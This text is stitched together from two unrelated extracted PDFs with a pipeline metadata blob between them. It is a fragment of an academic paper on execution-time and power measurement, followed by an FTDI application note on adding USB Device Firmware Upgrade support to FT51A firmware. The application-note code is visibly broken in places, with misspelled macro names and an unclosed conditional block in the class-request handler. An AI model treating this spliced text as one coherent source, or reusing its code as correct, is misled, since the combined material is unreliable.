<th>StrongARM</th>
<th>StrongARM</th>
<th>SPARClite</th>
<th>SPARClite</th>
</tr>
</thead>
<tbody>
<tr>
<td>Li/Malik</td>
<td>0</td>
<td>0</td>
<td>11986 ns</td>
<td>1282 nWs</td>
<td>18425 ns</td>
<td>15127 nWs</td>
</tr>
<tr>
<td>Ye/Ernst</td>
<td>3</td>
<td>0</td>
<td>11836 ns</td>
<td>1261 nWs</td>
<td>18125 ns</td>
<td>14880 nWs</td>
</tr>
<tr>
<td>Wolf/Ernst</td>
<td>3</td>
<td>2</td>
<td>9505 ns</td>
<td>911 nWs</td>
<td>14870 ns</td>
<td>12208 nWs</td>
</tr>
<tr>
<td>Exact Bounds</td>
<td>-</td>
<td>-</td>
<td>9471 ns</td>
<td>903 nWs</td>
<td>13650 ns</td>
<td>11206 nWs</td>
</tr>
</tbody>
</table>
Table 1. Upper bound execution time and power for the OAM component
7. CONCLUSION
Segment-wise, real-time execution and timing and power measurement preserving the cache behavior of the program under investigation is required for an application in formal program analysis. The presented approach to fast and compact trace acquisition including execution time and power measurement with off-the-shelf evaluation kits meets these requirements. Avoiding full traces by using trigger points leads to much higher efficiency than in previous approaches while the one-way communication through the terminal program allows real-time execution of the program under investigation. Result measurement using an off-the-shelf logic state analyzer, automatic evaluation and back annotation abstract the hardware evaluation kit to the same level as a software simulator. It is completely transparent to the designer working with an electronic design automation tool suite and matches novel approaches to formal running time analysis based on program segment execution.
Execution time and power consumption of program segments and complete programs has been measured using a commercial SPARClite evaluation kit. It is generic and can easily be applied to any commercial evaluation kit with bus access. Current work focuses on experiments with execution time and power consumption prediction using instruction tables which can be a base for software power reduction. Internet access to the measurement facilities is also under investigation.
REFERENCES
|
{"Source-Url": "https://www.ida.ing.tu-bs.de/index.php?eID=tx_nawsecuredl&file=%2Ffileadmin%2FPublikationen%2F2000%2FWKE00%3ACompaTraceGenerPower.pdf&g=0&hash=254c9d4506005d78191a446554e5afbf65a33cd1&t=1540470735&u=0", "len_cl100k_base": 8589, "olmocr-version": "0.1.53", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 31037, "total-output-tokens": 9759, "length": "2e13", "weborganizer": {"__label__adult": 0.0008835792541503906, "__label__art_design": 0.000964641571044922, "__label__crime_law": 0.0007624626159667969, "__label__education_jobs": 0.0007948875427246094, "__label__entertainment": 0.0001747608184814453, "__label__fashion_beauty": 0.0004048347473144531, "__label__finance_business": 0.0004367828369140625, "__label__food_dining": 0.0007181167602539062, "__label__games": 0.0023555755615234375, "__label__hardware": 0.07867431640625, "__label__health": 0.0010538101196289062, "__label__history": 0.0008001327514648438, "__label__home_hobbies": 0.0004017353057861328, "__label__industrial": 0.002262115478515625, "__label__literature": 0.00033664703369140625, "__label__politics": 0.0004718303680419922, "__label__religion": 0.0009918212890625, "__label__science_tech": 0.280517578125, "__label__social_life": 7.772445678710938e-05, "__label__software": 0.0106353759765625, "__label__software_dev": 0.61279296875, "__label__sports_fitness": 0.0006928443908691406, "__label__transportation": 0.0023956298828125, "__label__travel": 0.0004012584686279297}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 46943, 0.03709]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 46943, 0.29832]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 46943, 0.91491]], "google_gemma-3-12b-it_contains_pii": [[0, 4958, false], [4958, 10859, null], [10859, 15672, null], [15672, 20947, null], [20947, 25085, null], [25085, 27954, null], [27954, 31044, null], [31044, 33935, null], [33935, 36719, null], [36719, 42814, null], [42814, 42901, null], [42901, 46943, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4958, true], [4958, 10859, null], [10859, 15672, null], [15672, 20947, null], [20947, 25085, null], [25085, 27954, null], [27954, 31044, null], [31044, 33935, null], [33935, 36719, null], [36719, 42814, null], [42814, 42901, null], [42901, 46943, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 46943, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 46943, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 46943, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 46943, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 46943, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 46943, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 46943, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 46943, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 46943, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 46943, null]], "pdf_page_numbers": [[0, 4958, 1], [4958, 10859, 2], [10859, 15672, 3], [15672, 20947, 4], [20947, 25085, 5], [25085, 27954, 6], [27954, 31044, 7], [31044, 33935, 8], [33935, 36719, 9], [36719, 42814, 10], [42814, 42901, 11], [42901, 46943, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 46943, 0.04688]]}
|
olmocr_science_pdfs
|
2024-12-08
|
2024-12-08
|
9d55d7ab8c95257f32b5288364785fe102aa1bb4
|
Application Note
AN_344
FT51A DFU Sample
Version 1.0
Issue Date: 2015-12-21
This document provides a guide for using the FT51A development environment to incorporate DFU (Device Firmware Upgrade) support in firmware.
Use of FTDI devices in life support and/or safety applications is entirely at the user’s risk, and the user agrees to defend, indemnify and hold FTDI harmless from any and all damages, claims, suits or expense resulting from such use.
# Table of Contents
1 Introduction .................................................................................................................. 4
1.1 Overview .................................................................................................................. 4
1.2 Features .................................................................................................................... 4
1.3 Limitations ............................................................................................................... 4
1.4 Scope ......................................................................................................................... 4
2 DFU Overview .................................................................................................................. 5
2.1 DFU Library Overview .............................................................................................. 5
2.2 Firmware Overview .................................................................................................. 6
2.2.1 Run-Time Mode ................................................................................................. 6
2.2.2 DFU Mode ......................................................................................................... 7
2.2.1 FT51 Libraries ................................................................................................. 7
2.3 Host PC Application Overview ................................................................................ 7
3 DFU Firmware .................................................................................................................. 9
3.1 USB Descriptors ....................................................................................................... 9
3.1.1 Run-Time Descriptors ....................................................................................... 9
3.1.2 DFU Descriptors ............................................................................................. 11
3.1.3 Descriptor Selection ......................................................................................... 13
3.2 USB Class Requests ................................................................................................. 14
3.3 USB Reset Handler ................................................................................................. 15
3.4 Timer ....................................................................................................................... 16
3.5 Device Detach-Attach ............................................................................................. 16
4 DFU Application .............................................................................................................. 17
4.1 libusb-win32 .......................................................................................................... 17
4.1.1 Installing libusb-win32 Driver .......................................................................... 17
4.2 WinUSB .................................................................................................................... 17
4.2.1 Installing WinUSB Driver ............................................................................... 17
4.3 Loading Firmware Files ........................................................................................... 17
4.4 Programming DFU Interfaces .................................................................................. 17
5 Possible Improvements ........................................... 18
5.1 Obfuscating DFU Commands ............................... 20
5.2 Adding Manifestation Checks ............................... 20
5.3 Recovery .......................................................... 20
5.4 Security ............................................................ 20
6 Contact Information .............................................. 21
Appendix A – References ........................................... 23
Document References ............................................... 23
Acronyms and Abbreviations ..................................... 23
Appendix B – List of Tables & Figures ........................... 24
List of Figures .......................................................... 24
Appendix C – Revision History ................................... 25
1 Introduction
This application note documents the FT51A DFU library and provides an example firmware project for the FT51A and host PC application. The host PC application will communicate with the firmware on the FT51A to update the contents of the FT51A MTP Flash. All communication is via the USB interface.
1.1 Overview
The DFU firmware project and host PC application together demonstrate a reusable method for implementing firmware updates to an FT51A device. The FT51A need only be connected to a host PC via the USB interface.
The DFU firmware is added to the normal functional firmware programmed into the FT51A and is only activated when special commands are sent by the host PC. It can therefore be built-in to any FT51A firmware and used when required.
An example application would be to allow Field Service Engineers to update firmware on devices embedded in industrial machinery, or end users to apply an update to a device based on an FT51A.
1.2 Features
The DFU library has the following features:
- Open source library layered on FT51A USB Library.
- Can be added to existing firmware by adding an interface to the configuration descriptor.
- Ability to download firmware from host PC to device.
- User firmware implements the USB requests. This allows non-standard methods to be implemented to add obfuscation.
1.3 Limitations
The DFU library has the following limitations:
- No manifestation stage. The device cannot support manifestation and cannot therefore process a firmware image before programming.
As with most firmware updates, it is imperative that the firmware download is not interrupted either by power interruption or by interrupting the programming application as the data downloaded immediately overwrites the contents of the MTP Flash rendering the existing contents invalid.
A recovery method is to use the FT51A programmer/debugger module and the “FT51prg.exe” tool to re-load valid code to the MTP Flash. Details on this tool can be found in Application Note AN_289 FT51A Programming Guide. The executable and source code for “FT51prg.exe” are available in the FT51A Software Development Kit.
1.4 Scope
The guide is intended for developers who are creating applications, extending FTDI provided applications or implementing example applications for the FT51A.
In the reference of the FT51A, an “application” refers to firmware that runs on the FT51A; “libraries” are source code provided by FTDI to help user’s access specific hardware features of the chip.
The FT51A Tools are currently only available for Microsoft Windows platform and are tested on Windows 7 and Windows 8.1.
2 DFU Overview
The DFU protocol and requirements are documented in the Device Firmware Upgrade 1.1 specification:
http://www.usb.org/developers/docs/devclass_docs/DFU_1.1.pdf
The FT51A implementation is for devices which are capable of downloading and can optionally perform any detach-attach sequence to switch between DFU and run-time modes.
Due to the memory constraints of the FT51A it is not practical to implement manifestation. This would require storing and validating the firmware before programming the MTP Flash.
2.1 DFU Library Overview
The DFU library uses the FT51A USB library and calls the following functions:
- USB_transfer()
- USB_stall_endpoint()
It is contained in a single source code file “ft51_usb_dfu.c” and has a library header “ft51_usb_dfu.h”.
The DFU Attributes supported by the library, as described in the bmAttributes field of the DFU Functional Descriptor, are bitWillDetach and bitCanDownload. The bitManifestationTolerant and bitCanUpload features are not supported.
Calls to the library are made by the firmware when class requests are received for the DFU interface or when a bus state change on the USB is detected.
Additionally there is a timer handler which must be called every millisecond to implement the detach timer described in the specification.
The DFU library implements a state machine to provide the functionality required by the DFU specification. A schematic of the state machine is shown in Figure 2.1. Run-time mode states are red and DFU mode states are blue.
The “USB Reset” transitions can be either performed by the host resetting the USB or by the device detaching from the USB. If the bitWillDetach attribute is set then the device must perform detach. If it is not set then the host must reset the USB.
2.2 Firmware Overview
The firmware is specifically written to allow it to be adapted and easily included in other FT51A projects.
Firmware will initialise and configure the FT51A as normal, setting up the USB device as required. It will however, add some code to the USB standard requests handlers to support the DFU library.
The only libraries required are the FT51A USB library and parts of the FT51A General Config library. If LED indicators are desired then the IOMUX library can be added to configure output pins for LEDs.
2.2.1 Run-Time Mode
When in run-time mode, the firmware will return a configuration descriptor containing the normal functions of the FT51A firmware plus one additional interface descriptor for the DFU. This is the DFU functional descriptor.
The firmware will decode standard and vendor requests as normal, but check for class requests which are addressed to the DFU interface. If these are found then a function in the DFU library will be called. From run-time mode the DFU can check the status and state of the DFU state machine and initiate a DFU_DETACH to transition into DFU mode.
If the `bitWillDetach` attribute is not set the DFU_DETACH request will start a timer and continue. If a USB reset is observed before the timer expires then the DFU state machine will move to DFU mode.
If the `bitWillDetach` attribute is set the device will detach from the USB using a call to the USB library. The host will see this as a disconnection and will re-enumerate the device when it reattaches to the USB.
With both methods a function handler for USB reset events will call the DFU library to change from run-time to DFU mode.
### 2.2.2 DFU Mode
When DFU mode is entered, the normal functions of the firmware are not available and the firmware will return different device and configuration descriptors. This will have a single interface describing the DFU mode. The device will be re enumerated by the host and the new device and configuration descriptors read.
Standard USB requests will be handled as normal, but class requests to the DFU interface (this may be a different interface number in DFU mode from the run-time mode) will be passed to the DFU library.
If the `bitWillDetach` attribute is not set the device will rely on the host performing a USB reset when programming is finished, otherwise the device will detach from the USB and force the host to re enumerate the device.
Again, the function handler for USB reset events must also call the DFU library to change from DFU back to run-time mode and resetting the FT51A to run the newly programmed firmware.
### 2.2.3 FT51A Libraries
The DFU firmware uses the FT51A USB library, DFU library, general config library and the IOMUX library. The IOMUX library is not used in the example code but is included to allow further functionality to be added.
### 2.2.4 WinUSB Drivers
The firmware will use WCID (Windows Compatible ID) to tell a Microsoft Windows operating system that is requires WinUSB to be installed for the DFU interface. This is achieved by the firmware responding to a Microsoft defined string descriptor to identify the device as supporting WCID and providing the host PC with a vendor request code for the next stage of WCID.
The second stage tells the host PC which drivers to load for the device by responding to a set of vendor requests with information required.
When this is successfully completed the DFU interface is accessible to host PC applications using the WinUSB API. It is also compatible with libusb for Windows.
Please note that the WinUSB drivers will need to be installed when the device is first connected. They will also need to be installed when the device changes from run-time mode to DFU mode. Each time the driver is loaded it may go to Windows Update to check for newer drivers.
### 2.3 Host PC Application Overview
The host PC application recommended is dfu-util. This can be obtained from [http://dfu-util.sourceforge.net/](http://dfu-util.sourceforge.net/)
It uses the libusb library to communicate with the device via Microsoft WinUSB drivers.
The dfu-util program is a command line application that programs a binary file onto the device. The FT51A Eclipse plugin has a Post Build step to produce a ".bin" binary file from the IHX (Intel HeX file) output file using the makebin utility supplied by SDCC.
The format of the dfu-util command line is typically as follows:
```
dfu-util -D filename.bin
```
Refer to the documentation for dfu-util for further options.
The first time dfu-util switches the device from run-time to DFU mode it may timeout waiting for Windows to install the WinUSB driver. Re-running dfu-util when this process is complete will re-commence the firmware update correctly.
3 DFU Firmware
The firmware included in the example code demonstrates implementing run-time mode descriptors, DFU mode descriptors, switching from run-time to DFU mode and updating firmware. It has no run-time features; however, these can be added by extending the run-time configuration descriptor and adding code for the features.
The control endpoint max packet size is defined in the header of the firmware code for convenience along with the Product IDs (PIDs) used in the example. The setting of bMaxPacketSize0 in the device descriptor MUST match the size of the control endpoint max packet size set in the "ep_size" member of the USB_ctx structure when the USB library is initialised.
The following code is used to set the packet sizes for the control endpoint for both the device descriptor and USB initialisation.
```c
// USB Endpoint Zero packet size (both must match)
#define USB_CONTROL_EP_MAX_PACKET_SIZE 8
#define USB_CONTROL_EP_SIZE USB_EP_SIZE_8
```
The DFU library does not calculate addresses from the block numbers passed in the DFU_DNLOAD request. The application specifies both the size of the programming block and calculates the address. This increases the flexibility of the library and allows the application to set block sizes and even how addresses are calculated.
The maximum block size for the DFU library is 64 bytes as defined in DFU_MAX_BLOCK_SIZE in "ft51_usb_dfu.h". This can be changed to a smaller value by modifying the definition of DFU_BLOCK_SIZE.
```c
#define DFU_BLOCK_SIZE DFU_MAX_BLOCK_SIZE
```
3.1 USB Descriptors
The DFU firmware stores two sets of device descriptors and configuration descriptors. It stores a single table of string descriptors as the strings for run-time and DFU modes can be selected by the descriptors as needed from the same table.
The USB class, subclass and protocols along with other general USB definitions are found in the file "ft51_usb.h" library include file.
3.1.1 Run-Time Descriptors
The first set of descriptors is the run-time set. The device descriptor contains the VID and PID for the run-time function.
USB_device_descriptor device_descriptor_runtime =
{
.bLength = 0x12,
.bDescriptorType = 0x01,
.bcdUSB = USB_BCD_VERSION_2_0,
.bDeviceClass = USB_CLASS_DEVICE,
.bDeviceSubClass = USB_SUBCLASS_DEVICE,
.bDeviceProtocol = USB_PROTOCOL_DEVICE,
.bMaxPacketSize0 = USB_CONTROL_EP_MAX_PACKET_SIZE,
.idVendor = USB_VID_FTDI, // 0x0403 (FTDI)
.idProduct = DFU_USB_PID_RUNTIME, // 0x0fed
.bcdDevice = 0x0101,
.iManufacturer = 0x01, // String 1
.iProduct = 0x02, // String 2
.iSerialNumber = 0x03, // String 3
.bNumConfigurations = 0x01
};
The configuration descriptor would normally contain interface descriptors and endpoint descriptors for the run-time function. These are not implemented in this example.
The last interface descriptor, and the only one in this configuration descriptor, is for a DFU interface that implements no endpoints. All DFU communication is through the control endpoints to the DFU interface.
The USB class of Application Specific allows the subclass to specify that it is a Device Firmware Update (DFU) and the protocol indicates that this is Run-Time mode.
// Structure containing layout of configuration descriptor
struct config_descriptor_runtime
{
USB_configuration_descriptor configuration;
USB_interface_descriptor interface;
USB_dfu_functional_descriptor functional;
};
struct config_descriptor_runtime config_descriptor_runtime =
{
.configuration.bLength = 0x09,
.configuration.bDescriptorType = USB_DESCRIPTOR_TYPE_CONFIGURATION,
.configuration.wTotalLength = sizeof(struct config_descriptor_runtime),
.configuration.bNumInterfaces = 0x01,
.configuration.bConfigurationValue = 0x01,
.configuration.iConfiguration = 0x00,
.configuration.bmAttributes = USB_CONFIG_BMATTRIBUTES_VALUE,
.configuration.bMaxPower = 0xFA, // 500 mA
// ---- INTERFACE DESCRIPTOR for DFU Interface ----
.interface.bLength = 0x09,
.interface.bDescriptorType = USB_DESCRIPTOR_TYPE_INTERFACE,
.interface.bInterfaceNumber = DFU_USB_INTERFACE_RUNTIME,
.interface.bAlternateSetting = 0x00,
.interface.bNumEndpoints = 0x00,
.interface.bInterfaceClass = USB_CLASS_APPLICATION, // Application Specific Class
.interface.bInterfaceSubClass = USB_SUBCLASS_DFU, // Device Firmware Update
.interface.bInterfaceProtocol = USB_PROTOCOL_DFU_RUNTIME, // Runtime Protocol
.interface.iInterface = 0x05, // String 5
// ---- FUNCTIONAL DESCRIPTOR for DFU Interface ----
.functional.bLength = 0x09,
.functional.bDescriptorType = USB_DESCRIPTOR_TYPE_DFU_FUNCTIONAL,
.functional.bmAttributes = USB_DFU_BMATTRIBUTES_CANLOAD, // bitCanDnload
.functional.wDetachTimeOut = DFU_TIMEOUT, // suggest 8192ms
.functional.wTransferSize = DFU_BLOCK_SIZE, // typically 64 bytes
.functional.bcdDfuVersion = USB_BCD_VERSION_DFU_1_1, // DFU Version 1.1
};
The DFU functional descriptor contains a field called bmAttributes. This describes the sections of the DFU specification that are supported by the implementation.
The DFU library supports firmware downloading and device detach-attach. It does not support uploading or manifestation. Therefore the bmAttributes mask needs the “bitCanDnload” bit set, and “bitWillDetach” can be set or clear. It is not set in this example for clarity.
The "bitCanUpload" and "bitManifestationTolerant" must be clear.
### 3.1.2 DFU Descriptors
The device descriptor contains the VID and PID for the DFU function. This may or may not be the same as the run-time VID and PID.
USB_device_descriptor device_descriptor_dfumode =
{
.bLength = 0x12,
.bDescriptorType = USB_DESCRIPTOR_TYPE_DEVICE,
.bcdUSB = USB_BCD_VERSION_2_0,
.bDeviceClass = USB_CLASS_DEVICE,
.bDeviceSubClass = USB_SUBCLASS_DEVICE,
.bDeviceProtocol = USB_PROTOCOL_DEVICE,
.bMaxPacketSize0 = USB_CONTROL_EP_MAX_PACKET_SIZE,
.idVendor = USB_VID_FTDI, // 0x0403 (FTDI)
.idProduct = DFU_USB_PID_DFUMODE, // 0x0fee
.bcdDevice = 0x0101,
.iManufacturer = 0x01,
.iProduct = 0x04,
.iSerialNumber = 0x03,
.bNumConfigurations = 0x01
};
The configuration descriptor for DFU will contain only an interface descriptor and a functional descriptor for the DFU interface.
The USB class, subclass and protocol indicate that this device is now in DFU mode.
// Structure containing layout of configuration descriptor
struct config_descriptor_dfumode
{
USB_configuration_descriptor configuration;
USB_interface_descriptor interface;
USB_dfu_functional_descriptor functional;
};
struct config_descriptor_dfumode config_descriptor_dfumode =
{
.configuration.bLength = 0x09,
.configuration.bDescriptorType = USB_DESCRIPTOR_TYPE_CONFIGURATION,
.configuration.wTotalLength = sizeof(struct config_descriptor_dfumode),
.configuration.bNumInterfaces = 0x01,
.configuration.bConfigurationValue = 0x01,
.configuration.iConfiguration = 0x00,
.configuration.bmAttributes = USB_CONFIG_BMASSTRIBUTES_VALUE,
.configuration.bMaxPower = 0xFA, // 500 mA
// ---- INTERFACE DESCRIPTOR for DFU Interface ----
.interface.bLength = 0x09,
.interface.bDescriptorType = USB_DESCRIPTOR_TYPE_INTERFACE,
.interface.bInterfaceNumber = DFU_USB_INTERFACE_DFUMODE,
.interface.bAlternateSetting = 0x00,
.interface.bNumEndpoints = 0x00,
.interface.bInterfaceClass = USB_CLASS_APPLICATION, // Application Specific Class
.interface.bInterfaceSubClass = USB_SUBCLASS_DFU, // Device Firmware Update
.interface.bInterfaceProtocol = USB_PROTOCOL_DFU_DFUMODE, // Runtime Protocol
.interface.iInterface = 0x05, // String 5
// ---- FUNCTIONAL DESCRIPTOR for DFU Interface ----
.functional.bLength = 0x09,
.functional.bDescriptorType = USB_DESCRIPTOR_TYPE_DFU_FUNCTIONAL,
.functional.bmAttributes = USB_DFU_BMASSTRIBUTES_CANLDOWNLOAD, // bitCanDnload
.functional.wDetachTimeout = DFU_TIMEOUT, // suggest 8192ms
.functional.wTransferSize = DFU_BLOCK_SIZE, // typically 64 bytes
.functional.bcdDfuVersion = USB_BCD_VERSION_DFU_1_1,
};
The same bmAttributes mask must appear for the DFU functional descriptor in both run-time and DFU modes.
### 3.1.3 Descriptor Selection
The standard request handler for GET_DESCRIPTOR requests needs to select the run time or DFU mode descriptors. The firmware is responsible for ensuring the correct descriptors are returned to the host PC.
Determining if the firmware is in run-time or DFU mode is achieved by calling the `dfu_is_runtime()` function from the DFU library.
A non-zero response will select the run-time mode descriptors and a zero response, the DFU mode descriptors.
```c
FT51_STATUS standard_req_get_descriptor(USB_device_request *req) {
uint8_t *src = NULL;
uint16_t length = req->wLength;
uint8_t hValue = req->wValue >> 8;
uint8_t lValue = req->wValue & 0x00ff;
uint8_t i, slen;
switch (hValue) {
case USB_DESCRIPTOR_TYPE_DEVICE:
if (dfu_is_runtime()) {
src = (char *)device_descriptor_runtime;
} else {
src = (char *)device_descriptor_dfumode;
}
if (length > sizeof(USB_device_descriptor)) // too many bytes requested
length = sizeof(USB_device_descriptor); // Entire structure.
break;
case USB_DESCRIPTOR_TYPE_CONFIGURATION:
if (dfu_is_runtime()) {
src = (char *)config_descriptor_runtime;
if (length > sizeof(config_descriptor_runtime)) // too many bytes requested
length = sizeof(config_descriptor_runtime); // Entire structure.
} else {
src = (char *)config_descriptor_dfumode;
if (length > sizeof(config_descriptor_dfumode)) // too many bytes requested
length = sizeof(config_descriptor_dfumode); // Entire structure.
}
break;
}
}
```
The FT51A USB library will return the structure pointed to by the `standard_req_get_descriptor()` function.
Note that string descriptor selection is not shown in this code sample. It does not depend on the selection of run-time or DFU modes.
3.2 USB Class Requests
The firmware is responsible for handling USB class requests. It must determine if the firmware is in run-time or DFU mode and whether a request has been directed to the DFU interface. This must not interfere with other class requests that may be decoded in the firmware.
The first check is that the class request is aimed at an interface:
```c
FT51_STATUS class_req_cb(USB_device_request *req)
{
FT51_STATUS status = FT51_FAILED;
uint8_t interface = LSB(req->wIndex) & 0x0F;
// For DFU requests ensure the recipient is an interface...
if ((req->bmRequestType & USB_BMREQUESTTYPE_RECIPIENT_MASK) ==
USB_BMREQUESTTYPE_RECIPIENT_INTERFACE)
{
// For run-time mode, only the DFU_DETACH, DFU_GETSTATUS and DFU_GETSTATE requests are valid. All other requests will fail and stall the control endpoint.
if (dfu_is_runtime())
{
if ((interface == DFU_USB_INTERFACE_RUNTIME))
{
switch (req->bRequest)
{
case USB_CLASS_REQUEST_DETACH:
dfu_class_req_detach(req->wValue);
// Only uncomment if bitWillDetach is set in bmAttributes
//usb_detach_attach();
status = FT51_OK;
break;
case USB_CLASS_REQUEST_GETSTATUS:
dfu_class_req_getstatus();
status = FT51_OK;
break;
case USB_CLASS_REQUEST_GETSTATE:
dfu_class_req_getstate();
status = FT51_OK;
break;
}
}
}
}
}
```
If this is correct then the firmware must check if it is in run-time or DFU mode before checking the interface number. The interface number for the DFU mode may differ from that of the run-time mode.
For run-time mode, only the DFU_DETACH, DFU_GETSTATUS and DFU_GETSTATE requests are valid. All other requests will fail and stall the control endpoint.
The example shows that the DFU_DETACH request will not perform a detach as “bitWillDetach” is not set in the DFU functional descriptor.
If it is not in run-time mode then a different set of requests are valid.
else
{
if (interface == DFU_USB_INTERFACE_DFUMODE)
{
switch (req->bRequest)
{
case USB_CLASS_REQUEST_DNLOAD:
dfu_class_req_download(req->wValue * DFU_MAX_BLOCK_SIZE, req->wLength);
status = FT51_OK;
break;
case USB_CLASS_REQUEST_GETSTATUS:
dfu_class_req_getstatus();
if (dfu_is_wait_reset())
{
// Only uncomment if bitWillDetach is set in bmAttributes
//usb_detach_attach();
status = FT51_OK;
break;
case USB_CLASS_REQUEST_GETSTATE:
dfu_class_req_getstate();
status = FT51_OK;
break;
case USB_CLASS_REQUEST_CLRSTATUS:
dfu_class_req_clrstatus();
status = FT51_OK;
break;
case USB_CLASS_REQUEST_ABORT:
dfu_class_req_abort();
status = FT51_OK;
break;
default:
case USB_CLASS_REQUEST_UPLOAD:
// Unknown or unsupported request.
break;
}
}
return status;
}
In this mode, the DFU_DNLOAD, DFU_GETSTATUS, DFU_CLRSTATUS, DFU_GETSTATE and
DFU_ABORT requests are valid. DFU_UPLOAD is specifically checked for and disallowed although
ignoring it would have the same effect.
Again the device will not perform any detach as “bitWillDetach” is not set in the DFU functional
descrptor. The DFU_GETSTATUS request is the trigger for a detach-attach sequence when it is
set.
### 3.3 USB Reset Handler
Transitions from the appDETACH state to the dfuIDLE state and from dfuMANIFEST-WAIT-RESET
state to appIDLE are controlled by the USB reset handler function. This is set by the “reset”
member of the USB_ctx structure when the USB library is initialised.
When the reset occurs the dfu_reset() function should be called. If the new firmware which has
been downloaded is to be run then the function will return a non-zero value. If no further action is
required then it will return zero.
void reset_cb(uint8_t status) {
(void) status;
USB_set_state(DEFAULT);
if (dfu_reset()) {
device_revert();
}
}
In this way, when the dfuMANIFEST-WAIT-RESET state is reached the application will wait until a USB bus reset from the host (or a disconnect event) before loading and running the new application from MTP Flash.
A reset occurring when in appDETACH state will move the DFU state to dfuIDLE. This would be noticed the next time the firmware calls dfu_is_runtime().
### 3.4 Timer
The DFU needs a millisecond timer to accurately return to the appIDLE state from the appDETA CH state. The dfu_timer() function in the DFU library should be called every millisecond to enable this.
void detach_interrupt(const uint8_t flags) {
(void)flags; // Flags not currently used
// The DFU detach timer must be called once per millisecond
dfu_timer();
// Reload the timer
TH0 = MSB(MICROSECONDS_TO_TIMER_TICKS(1000));
TL0 = LSB(MICROSECONDS_TO_TIMER_TICKS(1000));
}
void detach_timer_initialise(void) {
// Register our own handler for interrupts from Timer 0
interrupts_register(detach_interrupt, interrupts_timer0);
// Timer0 is controlled by TMOD bits 0 to 3, and TCON bits 4 to 5.
TMOD &= 0x0F; // Clear Timer0 bits
TMOD |= 0x01; // Put Timer0 in mode 1 (16 bit)
// Set the count-up value so that it rolls over to 0 after 1 millisecond.
TH0 = MSB(MICROSECONDS_TO_TIMER_TICKS(1000));
TL0 = LSB(MICROSECONDS_TO_TIMER_TICKS(1000));
TCON &= 0xCF; // Clear Timer0’s Overflow and Run flags
TCON |= 0x10; // Start Timer0 (set its Run flag)
}
### 3.5 Device Detach-Attach
A function is provided that will detach and then reattach the device from the USB. This is only required if "bitWillDetach" is set in the DFU functional descriptor.
```c
void usbDetachAttach(void)
{
// Short delay
ms_timer = 10; while (ms_timer > 0);
// Disable USB device to force an reset
USB_finalise();
ms_timer = 10; while (ms_timer > 0);
// Start the USB device.
usb_setup();
}
```
4 WCID Selection
The Windows Compatible ID (WCID) method is used to select the WinUSB driver for the DFU interface.
4.1 WCID String Descriptor
The first step is to respond to a USB String Descriptor request for string number 0xEE with an application specific vendor request code to use for the rest of the WCID process.
This firmware defines the vendor request code to be 0xf1. This can be any value from 0x00 to 0xff.
```c
#define WCID_VENDOR_REQUEST_CODE 0xF1
```
A macro is defined in ft51_usb.h to craft a Microsoft WCID string descriptor from the required vendor request code.
```c
__code uint8_t wcid_string_descriptor[USB_MICROSOFT_WCID_STRING_LENGTH] = {
USB_MICROSOFT_WCID_STRING(WCID_VENDOR_REQUEST_CODE)
};
```
When responding to a GET_DESCRIPTOR request for a string the special case is added for the Microsoft WCID string descriptor.
```c
case USB_DESCRIPTOR_TYPE_STRING:
// Special case: WCID descriptor
if (lValue == USB_MICROSOFT_WCID_STRING_DESCRIPTOR)
{
src = (uint8_t *)wcid_string_descriptor;
length = sizeof(wcid_string_descriptor);
break;
}
```
After this string descriptor check has been performed then the normal string descriptors can be processed and returned.
4.2 WCID Vendor Requests
Once Windows has determined that a device supports WCID then it will issue vendor requests to get further information. This information determines which driver is installed and what GUIDs can be assigned to an interface to identify it to applications.
This firmware will request the WinUSB driver and provide a GUID for a device interface.
Once the vendor request is confirmed as the correct vendor request code then the firmware will respond with a compatible ID or a device GUID.
```c
if (req->bRequest == WCID_VENDOR_REQUEST_CODE)
{
if (req->bmRequestType & USB_BREQUESTTYPE_DIR_DEV_TO_HOST)
{
switch (req->wIndex)
{
case USB_MICROSOFT_WCID_FEATURE_WINDEX_COMPAT_ID:
if (length > sizeof(wcid_feature_runtime)) // too many bytes requested
length = sizeof(wcid_feature_runtime); // Entire structure.
if (dfu_is_runtime())
```
{
USB_transfer(USB_EP_0, USB_DIR_IN,
(uint8_t *) &wcid_feature_runtime, length);
status = FT51_OK;
}
else
{
USB_transfer(USB_EP_0, USB_DIR_IN,
(uint8_t *) &wcid_feature_dfumode, length);
status = FT51_OK;
}
break;
}
Run-time mode and DFU mode compatible IDs are required since the interface number of the DFU interface may differ between the two modes.
The GUID defined in this application for the FT51A is "{1eaaaa95-1bd6-49c2-b4ae-286583f61227}".
5 Possible Improvements
The lack of a manifestation stage could allow unwanted, unauthorised or unverified firmware to be programmed on the device.
If required then some additional checking can be done to protect the device.
5.1 Obfuscating DFU Commands
A simple method would be to change the DFU requests so that they did not match the specification. The host PC application would also change to match this.
Changes could be as simple as changing the values for bRequest in the SETUP token or adding additional steps into the DFU state machine.
A host PC application could conceivably issue disguised or undocumented commands to the FT51A to enable the DFU mode without the DFU interface appearing in the run-time mode configuration descriptor.
Note: A USB analyser can be used to reverse engineer these changes.
5.2 Adding Manifestation Checks
A manifestation phase could be implemented by downloading the firmware twice. The first pass could check the validity and checksum of the download and the second pass program the firmware into the MTP Flash.
